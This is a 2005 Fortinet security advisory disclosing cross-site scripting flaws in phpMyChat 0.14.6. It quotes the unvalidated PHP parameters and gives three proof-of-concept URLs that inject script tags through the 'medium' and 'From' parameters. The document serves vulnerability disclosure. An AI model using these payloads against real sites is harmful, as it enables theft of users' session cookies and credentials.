phpMyChat Multiple XSS vulnerabilities.

[secresearch () fortinet com]

phpMyChat Multiple XSS vulnerabilities.

I. BACKGROUND
phpMyChat is an easy-to-install, easy-to-use multi-room chat based on PHP
and a database, supporting MySQL, PostgreSQL, and ODBC.

II. DESCRIPTION
phpMyChat 0.14.6 start_page.css.php, style.css.php, users_popupL.php are
prone to Cross-site Scripting(XSS) vulnerability. A remote attacker could
get cookie-based credential information with a specially-crafted URL or
execute arbitrary web script or HTML.

III. PUBLISH DATE
2005-12-2

IV. AUTHOR
Louis Wang, Fortinet Security Research Team (FSRT)(secresearch at fortinet
dot com.)

V. AFFECTED SOFTWARE
phpMyChat 0.14.6 is confirmed to be affected.
Older versions are not verified.

VI. ANALYSIS
in start_page.css.php and style.css.php
if (!isset($medium) || $medium == "") $medium = 10;
$large = round(1.4 * $medium);
$small = round(0.8 * $medium);
Parameter $medium is not carefully validated.

in users_popupL.php
<A HREF="<?php echo("$From?Ver=L&L=$L"); ?>" TARGET="_blank"><?php
echo(L_CHAT); ?></A>
Parameter $From is not carefully validated.

VII. Proof of Concept
http://victimhost/phpmychat/chat/config/start_page.css.php?medium=><script>alert(29837274289742472);</script>&FontName=1
http://victimhost/phpmychat/chat/config/style.css.php?medium=><script>alert(29837274289742472);</script>&FontName=1
http://victimhost/phpmychat/chat/users_popupL.php?From=";><script>alert(29837274289742472);</script>>&L=english&LastCheck=1133281246&B=0

VIII. SOLUTION
Input validation will fix the vulnerability.

IX. ADVISORY
http://www.fortinet.com/FortiGuardCenter/idp.html#fsa

X. REFERENCE
http://phpmychat.sourceforge.net/